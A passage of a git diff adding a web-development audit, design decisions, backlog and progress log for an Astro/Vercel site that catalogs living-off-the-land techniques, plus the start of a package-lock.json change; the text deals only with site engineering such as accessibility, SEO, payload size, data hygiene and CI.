`cleanUrls: true, trailingSlash: false` → Vercel 308s `/catalog/` → `/catalog`. All 849 + canonical URLs point at a redirect. Fix: `trailingSlash: 'never'` in `astro.config.mjs` + + `build.format: 'file'` **or** flip vercel.json to `trailingSlash: true`. Pick one and make + canonical, sitemap and `url()` agree. +- `[tool].astro:46` pluralises on `> 1` so a 0-technique tool would read "0 technique". +- Per-deck index pages do pass a description (`[source]/index.astro:36`) — fine. +- D1 verified against `node_modules/astro/dist/core/build/generate.js:310` + (`ending = trailingSlash === "never" ? "" : "/"`) and `@astrojs/sitemap/dist/index.js:76`, + which special-cases `never`. + +### F12. Accessibility gaps +- **Heading order**: home is `h1` → `h3` (`HeroDeck.astro:47`, `index.astro:78`), no h2. + **Tool pages have a single h1 and no other headings** — each technique is an `<article>` with + a `<span class="tech__name">` (`[tool].astro:83-86`), so heading navigation is useless on the + site's core content. Make technique names `<h2>` (styled identically). +- **SearchModal**: `#search-results` lacks `role="listbox"` (`:23-25`) while children are + `role="option"` → invalid ARIA; **no focus trap**; `close()` (`:340-348`) never restores focus + to the opener; `[data-search-status]` (`:22`) has no `aria-live`. +- **Catalog**: `[data-cat-count]` rewritten on every filter with no `aria-live`; row expander + has `aria-expanded` but no `aria-controls`/`id` pairing (`catalog.ts:53-58`). +- Skip link uses `:focus-visible` only (fine in evergreen browsers). +- Contrast ratios pass per `tokens.css:58-60,129-137`; the risk is **size**: `--fg-faint` at + 8.5–10.5 px labels (`[source]/index.astro:73`, `index.astro:130-134`). Bump to ≥11 px. +- Reduced motion is handled thoroughly everywhere (app/hero/fuzz/css). + +### F13. Theming: no OS dark-mode fallback +`<html data-theme="light">` is hard-coded (`Base.astro:26`); the pre-paint script (`:44-78`) +reads `localStorage` only, never `matchMedia('(prefers-color-scheme: dark)')`. `theme-color` +meta *does* respond to the OS (`:36-37`), so a dark-OS first visit gets a cream page with dark +browser chrome. One-line fix in the inline script. + +### F14. Dead code and dead bytes +- Components with **zero imports**: `Operator.astro` (71 lines), `RecordRow.astro` (48, superseded + by `catalog.ts:53-67`), `SectionHeader.astro` (26, only used by the dead `Operator`). +- **Dead font**: `'Old Standard TT'` `@font-face` at `tokens.css:50` is referenced by no + `--font-*` token, yet Vite base64-inlines its 3 KB woff2 into the 78 KB CSS on every page. +- `sharp` is a dependency but `astro:assets` is unused (no images on the site) — keep it only if + the OG-PNG task below uses it at build time; otherwise drop. +- `src/fonts/` has 16 woff2 files; only 2 are preloaded (`Base.astro:34-35`); all + `font-display: swap`. + +### F15. 404 page doesn't help +`404.astro` shows a fake `curl -sI` block and two static actions. With 842 slugs known at build +time, a client-side nearest-slug suggestion ("did you mean /gtfobins/tar?") from +`Astro.url.pathname` is cheap: ship the slug list (~10 KB) inline on the 404 page only. + +### F16. Data pipeline — clean, but unsorted and unmonitored +Stats (computed read-only from `src/data/techniques.json`): + +| metric | value | +|---|--:| +| techniques / tools | 2,885 / 842 | +| by source | GTFOBins 2,125 · LOLBAS 481 · WADComs 100 · DÆMON 179 | +| by platform (multi) | Linux 2,306 · macOS 890 · Windows 744 · AD 217 | +| missing `description` | 1,264 (44%) | +| empty `mitre` | 190 (7%) | +| has `detection` | 506 (18%) | +| truly redundant rows (same toolId+context+command) | 46 (40 groups, e.g. `gtfo:code:download:0:sudo` ×6) | +| schema / taxonomy / MITRE-id / URL violations | 0 | +| orphan tools, orphan techniques, dup ids | 0 | + +- **Output order is readdir order**, not sorted (`build-dataset.mjs:135-140` `listFiles()` has no + `.sort()`). Same machine → stable; different FS → a 2 MB reorder diff with no content change. + Add a stable sort by `id` before emit. +- **46 genuinely duplicate rows** (identical toolId + context + command) inflate counts. Dedup at + ingest with a stable "keep first" rule and log what was dropped. +- **Freshness is invisible**: upstream commit hashes are recorded (`facets.commits`) but there + is no last-synced date and nothing checks for new upstream commits. A weekly GitHub Actions + cron that runs `git ls-remote` against the three upstreams and opens an issue/PR when the + hash moves is cheap. +- **Cross-repo build input**: `build-dataset.mjs:33` reads + `../daemon-sec/client/src/data/tools/wadcoms.ts` from a sibling checkout. Present on this + machine, but if absent the script **silently skips 134 DÆMON additions** (`:428-432`) and + emits a smaller dataset. Should be a hard error unless `--allow-missing-additions` is passed, + and ideally the additions should be vendored into this repo (or fetched by URL/commit). +- `references` schema is `z.string()` — tighten to `z.string().url()` + `^https?://` (see F6). +- Client projection: the fetched file's byte budget is references 15% · description 14% · + detection 14% · command 11%. A list projection dropping `detection` + `references` and + truncating `description` to 160 chars measures **1,019,976 B = 0.498×**; a minimal + id/tool/platform/capability/command list is 774 KB (0.38×). Detail fields already exist on + the SSR'd tool pages, so the island can link out rather than lazy-load. +- `daemon-backlog.json`: 45 entries, 100% populated, no placeholders. Good. + +### F17. 44% of techniques have no description +1,264 rows (overwhelmingly GTFOBins, whose upstream YAML has per-function descriptions only +sometimes) render as bare command + badges. The GTFOBins `_data/functions.yml` has a canonical +description per function — verified against upstream master, e.g. `shell: "This executable can +spawn an interactive system shell."`, `reverse-shell: "…can send back a reverse system shell to +a listening attacker."`; falling back to that at ingest time (and, for the committed JSON, via a +one-shot migration keyed on `nativeCategory[0]`) gives every GTFOBins row a one-line description +with zero authoring. Prefix with the context where set ("As sudo: …"). + +## Survey complete — summary of the picture + +The site is in good shape structurally (clean data, escaped rendering, thorough reduced-motion, +lazy Pagefind). The problems cluster into five tracks: + +1. **Ship it properly** — the Vercel migration is half done (no project, no DNS, wrong OG card, + canonicals → redirects, old Pages site live, no CI). +2. **Catalog UX** — back button, sort, focus loss, expanded-row loss, no SSR content. +3. **Findability/SEO** — JSON-LD, per-facet landing pages, absolute OG PNG, heading structure. +4. **Weight** — halve the dataset payload, purge unused CSS, drop the dead font/components. +5. **Data** — sort-stable output, dedup, description fallback, upstream drift check, hard-fail + on missing additions. + +## Design decisions (resolved, not surveyed) + +**D1. Trailing slash → `trailingSlash: 'never'` in `astro.config.mjs`, keep `build.format` +at its default `directory`.** `never` + `directory` makes Astro's `getUrlForPath` emit +slash-less URLs (sitemap and `Astro.url.pathname` agree with `vercel.json`'s +`trailingSlash: false`) while the physical output stays `…/index.html`, which is what keeps +Pagefind emitting `/gtfobins/bash`-style hrefs. Switching to `file` would make Pagefind index +`bash.html` and emit `.html` URLs that 308. Also: harden the canonical in `Base.astro:23` +(`pathname.replace(/(.)\/$/, '$1')`) and strip the trailing slash on Pagefind hrefs in +`SearchModal.astro:524`. `url()` in `lib/url.ts` needs no change. + +**D2. Catalog SSR → server-render the first `PAGE` (40) rows into the shell; per-facet landing +pages are a follow-on.** `catalog.ts` runs `boot()` at module scope and touches `document`, so +it can't be imported from Astro frontmatter. Extract the pure renderers (`renderRow`, `chip`, +`facetGroup`, `badge`) into a new `src/lib/render-row.ts` (zero DOM, zero side effects) and +import it from both `catalog.ts` and `catalog.astro`. Hand-off: the page renders +`techniques.slice(0, 40).map(renderRow)` into `[data-cat-results]` with a `data-ssr` marker and +the real count text. On boot the island reads `filtersFromSearch(location.search)`; if +`isEmpty(filters)` (currently a dead export in `lib/techniques.ts`) **and** `data-ssr` is set, +it wires listeners but skips the initial `render()` until the first interaction. Copy reads the +command from the row's own `<pre><code>` textContent, so it works before the fetch resolves. + +**D3. Slim payload → `public/data/index-<sha256[0:8]>.json` (~1.0 MB, 0.5×).** Keep per row: +`id, toolId, toolName, name, source, platform[], capability[], command, added?, description` +(truncated to 160 chars). Drop `usecase, mitre, privilege, context, requires, services, +fullPath, toolType, detection, references, verifyNote`. The expanded row shows description + +badges + a "full details →" link to `toolRoute(t.toolId)#<technique-id>` (add `id={t.id}` on +`<article class="tech">` at `[tool].astro:83`). Anchor beats lazy per-tool fetch: the detail is +already SSR'd there and it needs no new fetch infrastructure. A `scripts/build-index.mjs` +writes the hashed file plus `src/data/index-hash.json` (`{"file": "index-….json"}`), which +`catalog.astro` imports → `data-index-url`; the island fetches `root.dataset.indexUrl`. +`vercel.json` gets `Cache-Control: public, max-age=31536000, immutable` for +`/data/index-(.*).json`. `.gitignore` already covers `/public/data/`; add `build:index` to +both `build` and `dev` scripts. + +**D4. History → push on discrete intent, replace on keystroke.** `sync(push: boolean)`: +`pushState` for facet toggle / NEW / clear / sort, `replaceState` from the debounced query +handler. `popstate` handler re-reads `filtersFromSearch(location.search)`, resets `limit`, +re-renders, and never calls `sync` (no echo entry). + +**D5. CI → two workflows, no deploy job (Vercel deploys).** `ci.yml`: job `quality` +(`npm ci` → `npm run check` → `npm test` → `npm run validate:data`) and job `build` +(`npm ci` → `npm run build`). `upstream-drift.yml`: weekly cron, `git ls-remote <upstream> HEAD` +×3, compare the short hash against `facets.json .commits`, `gh issue create` on divergence. +New scripts: `check: astro check`, `test: node --test test/`, +`validate:data: node scripts/validate-data.mjs`, `build:index`. New devDep: `@astrojs/check` +(not installed today; `typescript` is). + +**D6. OG image → one site-wide 1200×630 PNG rendered at build by `sharp`** from a corrected +DÆMONBins SVG template (`scripts/og.mjs` → `public/og.png`), run before `astro build` so it +lands in `dist/`. Per-source variants are a nice-to-have later. + +**D7. JSON-LD → `src/lib/jsonld.ts` builders, injected by a `jsonLd` prop on `Base.astro`.** +Tool page: `TechArticle` (headline = tool name, `articleSection` = source label, `keywords` = +capabilities, `about` = MITRE ids) + `BreadcrumbList` (Catalog → Source → Tool). Home: +`WebSite` + `SearchAction` targeting `/catalog?q={search_term_string}`. Catalog: +`CollectionPage`. Credits: `Dataset` (`license` = GPL-3.0 URL, `isBasedOn` = the three +upstream repos from `SOURCE_META`). + +**D8. Tests → `node --test test/*.test.mjs`, TS loaded through esbuild.** A tiny +`test/_loadts.mjs` bundles a TS entry with `esbuild.build({bundle: true, format: 'esm', +write: false})` and imports it as a `data:` URL — the exact pattern `build-dataset.mjs:435` +already uses, so zero new deps and extensionless intra-lib imports resolve. Plain +`--experimental-strip-types` would not resolve those. + +**D9. GitHub Pages → disable it once Vercel + DNS are live.** No CI can update it any more, so +it will only rot. If inbound links matter, first push a one-off `gh-pages` branch of stub pages +with `<meta http-equiv="refresh">` + canonical to the new domain, keep it ~30 days, then +disable. + +## Prerequisites (user-side, outside the repo) + +These block Track 1 verification and cannot be done from code: + +1. Create the Vercel project: import `DAEMON-404/daemon-sec-lotl` into team + `00xnetrunners-projects`, framework preset Astro (vercel.json pins the rest). Set Node to + `22.x` in project settings. Enable Web Analytics + Speed Insights (the `<head>` scripts in + `Base.astro` are already wired and no-op until then). +2. Add the domain `lotl.daemon-sec.xyz` to the project; add the CNAME (or ALIAS) record in the + `daemon-sec.xyz` DNS zone. +3. After the first successful production deploy: disable GitHub Pages in repo settings (D9). +4. Locally, when Track 5 needs to regenerate data: run `scripts/setup-vendor.sh` / + `git submodule update --init` to populate `vendor/`. + +## Backlog (ordered) + +Effort S ≈ <1 h, M ≈ half a day, L ≈ a day. Impact is user-visible impact. + +### Track 0 — Tooling / CI (guardrail first) + +**T0.1 Extract the Zod schema + `validate:data`** · S · dev +Files: new `scripts/technique-schema.mjs` (move `TechniqueSchema` + enums out of +`build-dataset.mjs:181-204`; `build-dataset.mjs` imports it), new `scripts/validate-data.mjs` +(reads `src/data/techniques.json`, `safeParse` every row, dup-id check mirroring +`build-dataset.mjs:534-549`, exit 1 on any failure). Verify: `node scripts/validate-data.mjs` +exits 0 today. + +**T0.2 Test suite** · M · dev +Files: `test/_loadts.mjs`, `test/techniques.test.mjs`, `test/highlight.test.mjs`, +`test/wadcoms.test.mjs`; `package.json` `test` script. Assertions: +- `toolSlug('gtfo:vim') === 'vim'`; `toolSlug('wadcoms:Impacket-GetUserSPNs')` lower-cases; + `filtersFromSearch(filtersToSearch(f))` deep-equals `f`; `filtersToSearch(EMPTY_FILTERS) === ''`; + `matches` passes a Linux row for `{platform:['Linux']}`, fails for `['Windows']`; `addedOnly` + excludes non-`added`. +- `escapeHtml('<b>&"')` has no `<` or `"`; `highlightCommand('echo <x>')` has no raw `<x>`. +- `impacketScript(['…/examples/secretsdump.py'], cmd) === 'secretsdump'`, falls back to the + command basename, `null` otherwise; `canonicalizeFamilyCase` folds `Enum4Linux`/`enum4linux`. +Verify: `npm test` green. Deps: none. + +**T0.3 CI + upstream-drift workflows** · S · dev +Files: `.github/workflows/ci.yml`, `.github/workflows/upstream-drift.yml`, `package.json` +(`check`), devDep `@astrojs/check`. Per D5. Verify: `npm run check` locally, then a push. +Deps: T0.1, T0.2. + +### Track 1 — Ship it properly + +**T1.1 Trailing-slash canonicalisation** · S · high +Files: `astro.config.mjs` (`trailingSlash: 'never'`), `Base.astro:23`, `SearchModal.astro:524`. +Per D1. Verify: rebuild; `grep -c '/</loc>' dist/sitemap-0.xml` → 1 (only `/`); canonical in +`dist/gtfobins/bash/index.html` is `…/gtfobins/bash`. Deps: none. + +**T1.2 OG PNG + complete social meta** · M · high +Files: new `scripts/og.mjs`, corrected `public/og.svg` (currently the cheatsheet's card), +`Base.astro:38-42`, `package.json` build chain. Add absolute `og:image` +(`new URL('/og.png', Astro.site)`), `og:url`, `og:site_name`, `og:image:width/height/alt`, +`twitter:title/description/image`. Verify: `file dist/og.png` → PNG 1200×630; view-source shows +absolute URLs; paste a tool URL into a card debugger once live. Deps: none. + +**T1.3 OS dark-mode fallback** · S · med +File: `Base.astro:48-50` — when `localStorage.theme` is unset, use +`matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light'`. Verify: dark-OS +first visit paints Night, toggle still persists. Deps: none. + +**T1.4 Cache headers + Node pin** · S · med +File: `vercel.json` — immutable header for `/data/index-(.*).json`; `max-age=600` for the +unhashed `/data/techniques.json` while it still exists; leave `_astro/*` to Vercel defaults. +Node `22.x` in the Vercel project. Deps: T4.1 for the hashed name (header can land first). + +**T1.5 Pages sunset** · S · med — per D9; user-side switch after T1.1/T1.2 are live. + +### Track 2 — Catalog UX (one coherent island refactor) + +**T2.1 Back button** · S · high +File: `catalog.ts:119-151`. Per D4. Verify: toggle two facets, Back undoes them one at a time; +typing does not spam history; reload keeps state. Deps: none. + +**T2.2 Facet focus retention + live counts** · S · med +Files: `catalog.ts:94-101,133-141`; `catalog.astro:40` (`aria-live="polite"` on +`[data-cat-count]`). Toggle `aria-checked` on the clicked chip in place instead of rebuilding +`facetsEl.innerHTML`; rebuild only on clear/popstate. Verify: keyboard-toggle a chip, focus +stays on it; screen reader announces the new count. Deps: T2.1. + +**T2.3 Persist expanded rows across "Show more"; copy from DOM** · S · med +Files: `catalog.ts:103-117,151,154-172`. "Show more" appends only the new slice via +`insertAdjacentHTML('beforeend', …)`; copy reads `.trow__cmd code` textContent (drops the +`all.find` and lets `copy.ts` be the single clipboard helper — delete the duplicate in +`catalog.ts:178-189`). Add `aria-controls`/`id` pairing on the expander. Verify: expand, Show +more, row stays open. Deps: T2.1. + +**T2.4 Sort control** · M · med +Files: `catalog.astro` (`<select data-cat-sort>`: tool · source · capability · NEW first), +`lib/techniques.ts` (`sortTechniques(list, key)` pure fn; `sort=` in `filtersTo/FromSearch`), +`catalog.ts` (sort before slice). Verify: unit test on `sortTechniques`; URL carries `sort=`. +Deps: T2.1. + +**T2.5 Small island hygiene** · S · low +`catalog.ts:14-15` import `url()` from `lib/url.ts` instead of reimplementing; delete dead +exports `accentOf` (unless T3.4 uses it); precompute a lowercase haystack per record once at +boot instead of per keystroke in `lib/techniques.ts:85-91`. Deps: T2.1. + +### Track 3 — Findability / SEO / a11y + +**T3.1 Heading structure** · S · med +Files: `[tool].astro:85-86` (`<span class="tech__name">` → `<h2 class="tech__name">`, CSS keys +off the class so visuals hold), `index.astro` (an `h2` before the deck grid so home is not +h1→h3), `[tool].astro:46,58` (pluralise on `!== 1`). Verify: heading outline in devtools / +axe. Deps: none. + +**T3.2 SearchModal ARIA** · S · med +File: `SearchModal.astro:22-25,340-348`. Add `role="listbox"` on `#search-results`, +`aria-live="polite"` on `[data-search-status]`, remember the opener and restore focus in +`close()`, trap Tab inside the dialog while open. Verify: open with `/`, Tab cycles inside, +Esc returns focus to the trigger. Deps: none. + +**T3.3 JSON-LD** · M · med +Files: new `src/lib/jsonld.ts`, `Base.astro` (`jsonLd` prop → `<script type="application/ld+json" set:html={JSON.stringify(obj)}>`), +`[tool].astro`, `index.astro`, `catalog.astro`, `credits.astro`. Per D7. Verify: paste dist HTML +into Google's Rich Results test. Deps: T1.1 (URLs in breadcrumbs must be canonical). + +**T3.4 SSR the first 40 catalog rows** · L · high +Files: new `src/lib/render-row.ts`, `catalog.ts`, `catalog.astro`. Per D2. Verify: +`wc -c dist/catalog/index.html` grows from 17 KB to ~60 KB; with JS disabled the page shows 40 +rows; no double-render flash; deep link `/catalog?p=Windows` still applies filters on boot. +Deps: T2.1–T2.3. + +**T3.5 Per-facet landing pages** · M · med +File: new `src/pages/catalog/[facet].astro` — `getStaticPaths` from `facets.json` +(platforms + sources + capabilities ≈ 26 pages), each with a real title/description/canonical, +reusing `render-row.ts` + `filterTechniques`, linking into `/catalog?…` for the interactive +view. Verify: `ls dist/catalog/`; sitemap gains 26 URLs. Deps: T3.4, T1.1. + +**T3.6 Smarter 404** · S · low +File: `404.astro` — inline the 842 slugs from `tools.json` (~10 KB, this page only), nearest +match on `location.pathname` → "Did you mean /gtfobins/tar?". Deps: none. + +**T3.7 Label legibility** · S · low +Bump `--fg-faint` micro-labels from 8.5–10.5 px to ≥ 11 px at `[source]/index.astro:73` and +`index.astro:130-134`. Deps: none. + +### Track 4 — Weight + +**T4.1 Slim hashed list payload** · M · med +Files: new `scripts/build-index.mjs`, generated `src/data/index-hash.json`, `catalog.ts:200`, +`catalog.astro`, `[tool].astro:83` (`id={t.id}`), `package.json` (`build:index` in `build` and +`dev`). Per D3. Verify: `wc -c public/data/index-*.json` ≈ 1.0 MB; catalog still filters; +"full details →" lands on the right anchor. Deps: T3.4. + +**T4.2 Canvas pause + lifecycle leaks** · S · low +Files: `fuzz.ts:175-179` (pause the rAF loop on `visibilitychange` and when the canvas leaves +the viewport via IntersectionObserver, like `hero.ts:55`), `app.ts:414-432` (guard `initTOC` +with `data-toc-bound` and disconnect on `astro:before-swap`, or delete it — no TOCs exist), +`copy.ts:26` (call `done()` before the `execCommand` try can throw). Verify: scroll the hero +off-screen, CPU drops in the performance panel. Deps: none. + +**T4.3 Dead font + dead components** · S · low +Remove the `'Old Standard TT'` `@font-face` at `tokens.css:50` (base64-inlined into every +page's CSS); delete `Operator.astro`, `RecordRow.astro`, `SectionHeader.astro` after a final +`grep -rn` confirms zero imports. Verify: bundle CSS shrinks by ~4 KB; build passes. Deps: none. + +**T4.4 CSS coverage pass** · M · low +Prune cheatsheet-only selectors from `global.css` / `daemon.css` (`.download-library__head`, +TOC, callouts, scroll-progress) after a browser coverage run on `/`, `/catalog`, a tool page and +a deck page. Non-blocking; do last. Deps: none. + +### Track 5 — Data (verify via one-shot migration + unit tests; `vendor/` is absent here) + +**T5.1 Stable sort + dedup** · M · low (user) / high (diff hygiene) +Files: `build-dataset.mjs:135-140` (`.sort()` in `listFiles`), a stable `sort by id` before +emit, keep-first dedup on `toolId+context+command` with a log line; new one-shot +`scripts/normalize-order.mjs` (mirror `split-impacket.mjs`) that applies the same sort+dedup to +the committed JSON now. Verify: run the one-shot; `validate:data` still 0; technique count +drops by 46; `facets.json` counts regenerate. Deps: T0.1. + +**T5.2 Tighten `references` / `detection.value`** · S · low (security) +File: `scripts/technique-schema.mjs` — `z.string().url().regex(/^https?:\/\//)`. Verify: +`validate:data` passes (0 non-http today). Deps: T0.1. + +**T5.3 Hard-fail on missing DÆMON additions** · S · low +File: `build-dataset.mjs:428-432` — throw unless `--allow-missing-additions`; longer term, +vendor the 134 additions into this repo so the build has no sibling-checkout dependency. +Deps: none. + +**T5.4 GTFOBins description fallback** · M · med +Files: `build-dataset.mjs` (a `GTFO_FN_DESC` table from `_data/functions.yml`, applied when +`description` is empty, prefixed with the context), plus a one-shot migration keyed on +`nativeCategory[0]` for the committed JSON. Verify: missing-description count drops from 1,264 +toward ~0 for GTFOBins; unit test on `descFor(fn, context)`. Deps: T5.1. + +**T5.5 Freshness signal** · S · low +Show `facets.commits` short hashes (already recorded) on `/credits` with a link to each +upstream commit, so readers can see how current each deck is; the drift cron in T0.3 keeps +them honest. Deps: T0.3. + +## Recommended first pass (~1–2 days) + +1. **T0.1 → T0.2 → T0.3** — guardrail first; nothing after this can regress silently. +2. **T1.1 + T1.3** — one-line, high-leverage: 849 canonicals stop pointing at redirects; dark-OS + first visit is right. +3. **T1.2 + T3.3 + T3.1 + T3.2** — the SEO/a11y payload that makes the migration worth shipping; + all independent, all checkable in `dist/`. +4. **T2.1 → T2.2 → T2.3 → T2.5** — the island refactor as one coherent change. +5. **T3.4 + T4.1 (+ T1.4)** if time remains — the biggest single win (crawlable catalog, first + paint, half the payload) and the riskiest hydration change, so it goes last with tests in + place. + +Second pass: T2.4 sort, T3.5 facet pages, T3.6 404, T3.7, T4.2–T4.4, all of Track 5, T5.5. +Track 5 lands behind the one-shot migrations + unit tests until `vendor/` is populated. + +## Verification + +Per-item checks are listed inline above. End-to-end, after each pass: + +```bash +npm ci +npm run check # astro check (after T0.3) +npm test # node --test (after T0.2) +npm run validate:data # Zod over the committed JSON (after T0.1) +npm run build # data:public → astro build → pagefind +npm run preview # http://localhost:4321 +``` + +Then, in the browser (Chrome tools available in this session): +- `/` — dark-OS first visit paints Night; counters animate; hero deck cycles; `/` opens search. +- `/catalog` — 40 rows visible before the fetch resolves (T3.4); toggle two facets then press + Back twice (T2.1); Tab to a chip, Space, focus stays (T2.2); expand a row, Show more, still + open (T2.3); `?p=Windows&c=Execution` deep link applies on load. +- `/gtfobins/bash` — h1 + h2 outline; JSON-LD validates; `#<technique-id>` anchor scrolls. +- View-source on any page: canonical without trailing slash, absolute `og:image` PNG. +- `dist/sitemap-0.xml` — no trailing slashes; `dist/og.png` is 1200×630. +- Network panel on `/catalog` — one `index-<hash>.json` ≈ 165 KB brotli, `immutable` cached. + +Once the Vercel project + DNS exist: `curl -sI https://lotl.daemon-sec.xyz/catalog/` → 308 to +`/catalog`; `curl -sI …/data/index-<hash>.json` shows the immutable header; social card +debugger renders the PNG; GitHub Pages returns 404 after T1.5. + +## Progress log (first pass, 2026-09-04) + +Ticked as each item lands in the working tree. Nothing is committed — VCS is the user's. + +- [x] **T0.1** `scripts/technique-schema.mjs` (vocabulary + `TechniqueSchema` + `HttpUrl` + + `validateTechniques()`), `scripts/validate-data.mjs` (schema, unique ids, tool↔technique + integrity, facet-count consistency, taxonomy.ts drift). `build-dataset.mjs` now imports both; + `zod` import dropped there. `npm run validate:data` → OK on the committed data. T5.2 landed + with it (references must match `^https?://\S+$`, MITRE ids must match `^T\d{4}(\.\d{3})?$`). +- [x] **T0.2** `test/_loadts.mjs` (esbuild → data: URL loader), `test/techniques.test.mjs`, + `test/highlight.test.mjs`, `test/wadcoms.test.mjs` — 12 tests, all green via `npm test`. +- [x] **T0.3** `.github/workflows/ci.yml` (quality + build jobs, canonical-slash sanity check) + and `.github/workflows/upstream-drift.yml` (weekly `git ls-remote` vs `facets.commits`, + opens/updates a labelled issue). `@astrojs/check` installed; `npm run check` added. + `astro check` surfaced 11 pre-existing type errors (implicit `any`s in + `astro.config.mjs` under `// @ts-check`, `event.key` on `Event` in `app.ts:73`, an + untyped optional `exact` on the Header NAV items) — all fixed; now **0 errors**. +- [x] **T1.1** `trailingSlash: 'never'` in `astro.config.mjs`; canonical in `Base.astro` strips + the slash; Pagefind result hrefs stripped in `SearchModal.astro`. Rebuild + sitemap check + pending. +- [x] **T1.2** `Base.astro` now emits absolute `og:image` (PNG), `og:url`, `og:site_name`, + `og:image:width/height/alt`, `twitter:title/description/image`. New `scripts/og.mjs` + (`npm run og`) renders `public/og.png` 1200×630 (2× supersampled) from a DÆMONBins template + with live counts from `facets.json`, using the site's own faces: the WOFF2s in `src/fonts` + are decompressed to TTF into a temp dir (`woff2_decompress`, fonttools fallback) and served + to sharp through a private fontconfig — sharp's bundled FreeType renders WOFF2 as tofu. + Decision change vs. the plan: the PNG is **committed, not built** — Vercel's build image has + different fonts and a card that differs per environment is worse than one that changes only + on `npm run og`. `public/og.svg` is now the DÆMONBins template (was the cheatsheet's card). +- [x] **T1.3** `Base.astro` pre-paint script falls back to `prefers-color-scheme` when no + stored theme. +- [x] **T3.2** SearchModal: opener remembered and refocused on close, Tab trapped inside the + dialog, `aria-live="polite"` on the status line, cheatsheet-era labels ("Search + cheatsheets", "DÆMON//SEC") corrected. (`role="listbox"` was already toggled dynamically in + `write()` — the audit's "missing listbox" finding was wrong.) +- [x] **T3.1** Tool pages: each technique title is an `<h2 class="tech__name">` (metrics + preserved via `margin:0; line-height:1.3; text-transform:none`); "1 techniques" pluralisation + fixed in both title meta and description. Home: the two section eyebrows are `<h2>`s with a + scoped rule that keeps the `<p>` metrics, so the outline is h1 → h2 → h3. +- [x] **T3.3** `src/lib/jsonld.ts` — `website()` (+ `SearchAction` → `/catalog?q=`), + `dataset()` (GPL licence, `isBasedOn` the three upstreams with their pinned commit as + `version`, `DataDownload` → `/data/techniques.json`), `collectionPage()`, `breadcrumbs()`, + `techArticle()` (keywords = capabilities + platforms + aliases, `about` = MITRE ids with + ATT&CK URLs, `isBasedOn` = upstream entry), `serialize()` escapes `<`. `Base.astro` takes + a `jsonLd` prop and emits one inline `application/ld+json` script. Wired on home (WebSite + + Dataset), /catalog (CollectionPage), /credits (Dataset), every tool page (TechArticle + + BreadcrumbList). +- [x] **T2.1 / T2.2 / T2.3 / T2.5** `src/scripts/catalog.ts` rewritten around one `apply()` + path: facet toggles, NEW and Clear `pushState`; the debounced query `replaceState`s; a + `popstate` handler re-reads the URL (removed on `astro:before-swap`). Chips are built once and + their `aria-checked` is toggled in place, so keyboard focus stays on the chip you pressed. + "Show more" appends the next 40 rows with `insertAdjacentHTML`, so open rows stay open. Each + expander has `aria-controls` → the panel's `id`. The text query runs against a lowercase + haystack precomputed once per record. `url()` is imported from `lib/url.ts`. The island no + longer carries clipboard code: `src/scripts/copy.ts` is now a delegated document-level + `[data-copy]` handler shared with the tool pages (rows carry `data-cmdbar`), and its fallback + reports "failed" instead of claiming success when `execCommand` returns false. + `catalog.astro`: `aria-live="polite"` on the result count. `astro check` 0 errors; build OK. + **Verified end to end** in headless Chromium over the DevTools protocol against + `npm run preview` (script: session scratchpad `e2e.mjs`, 32 checks): dark-OS first visit + paints Night; home outline H1,H2,H2,H3×4; JSON-LD parses; `/` opens search, Esc restores + focus to the opener; 40 rows render; Windows chip → `?p=Windows`, focus stays on the chip, + count updates; second facet pushes a second entry; Back undoes one facet at a time and + restores the count; Forward re-applies; typing → `q=` without pushing history; Clear; + expander `aria-expanded`/`aria-controls` → panel; Show more → 80 rows with the first row + still open; deep link `?p=Linux&c=File%20Read&new=1` applies on load; tool pages have h2s, + slash-less canonical, absolute PNG `og:image`; Pagefind result hrefs carry no trailing + slash; results container is a listbox. The only console noise is 404s for + `/_vercel/insights/script.js` and `/_vercel/speed-insights/script.js`, which exist only on + Vercel (PROD-gated in `Base.astro`) — expected under `astro preview`. +- [x] **T1.4** `vercel.json`: `Cache-Control: immutable` for `/data/index-(.*).json` (the + future hashed slim payload) and `max-age=600, must-revalidate` for the unhashed + `/data/techniques.json`. Node pin is a Vercel project setting (user-side prerequisite #1). +- [x] **T3.7** Micro-labels raised to 11px: `.src__tplat` (was 8.5px) on deck pages, the + platform-counter caption and `.home-source__tag` (were 10–10.5px) on the home page. + +### First pass — final gate (all green) + +``` +npm run validate:data → OK: 2885 techniques, 842 tools, 179 NEW +npm test → 12 tests, 12 pass, 0 fail +npm run check → 0 errors, 0 warnings +npm run build → 850 pages, Pagefind indexed 842 +``` + +Headless-Chromium e2e (32 checks): 31 pass; the one "fail" is two `/_vercel/*` script 404s that +exist only on Vercel and are expected under local preview. + +### Deferred to a second pass (unchanged from the backlog above) + +- **T3.4 + T4.1** — SSR the first 40 catalog rows + ship the slim hashed payload. The single + biggest win and the riskiest hydration change; the shared `render-row.ts` extraction is now + low-risk because the island is already refactored and unit-tested. Do these together. +- **T1.5** Pages sunset · **T2.4** sort · **T3.5** per-facet landing pages · **T3.6** smarter + 404 · **T4.2** canvas pause + `initTOC` leak + `copy.ts` fallback (partly done: copy.ts now + reports failure) · **T4.3** dead font/components · **T4.4** CSS coverage. +- **Track 5 data** — T5.1 stable sort + dedup, T5.3 hard-fail on missing additions, T5.4 + GTFOBins description fallback, T5.5 freshness on /credits. (T5.2 URL/MITRE schema tightening + landed with T0.1.) These need `vendor/` for a real `npm run data`; land them behind the + one-shot migration pattern + unit tests. + +### User-side prerequisites still open (cannot be done from code) + +1. Create the Vercel project (import the repo, preset Astro, Node 22.x), enable Analytics + + Speed Insights. +2. Add `lotl.daemon-sec.xyz` to the project and the DNS record — the domain does not resolve yet. +3. After first deploy, sunset GitHub Pages (still live at the old URL with a self-canonical). diff --git a/package-lock.json b/package-lock.json @@ -15,11 +15,74 @@ "sharp": "^0.35.4" }, "devDependencies": { + "@astrojs/check": "^0.9.10", "esbuild": "^0.25.0", "github-slugger": "^2.0.0", "js-yaml": "^4.1.0", "pagefind": "^1.3.0", "zod": "^3.24.0" + }, + "engines": { + "node": ">=20" + } + }, + "node_modules/@astrojs/check": { + "version": "0.9.10", + "resolved": "https://registry.npmjs.org/@astrojs/check/-/check-0.9.10.tgz", + "integrity": "sha512-zgx/UQMozdjOa3bOxjgeCFdtpE3c9rRX6xHwa+2QXvy8z8Akifu2AtubHyv/zzC2znO8dl8fFWL4K+Ba9kS8HQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@astrojs/language-server": "^2.16.7", + "chokidar": "^4.0.3", + "kleur": "^4.1.5", + "yargs": "^18.0.0" + }, + "bin": { + "astro-check": "bin/astro-check.js" + }, + "peerDependencies": { + "typescript": 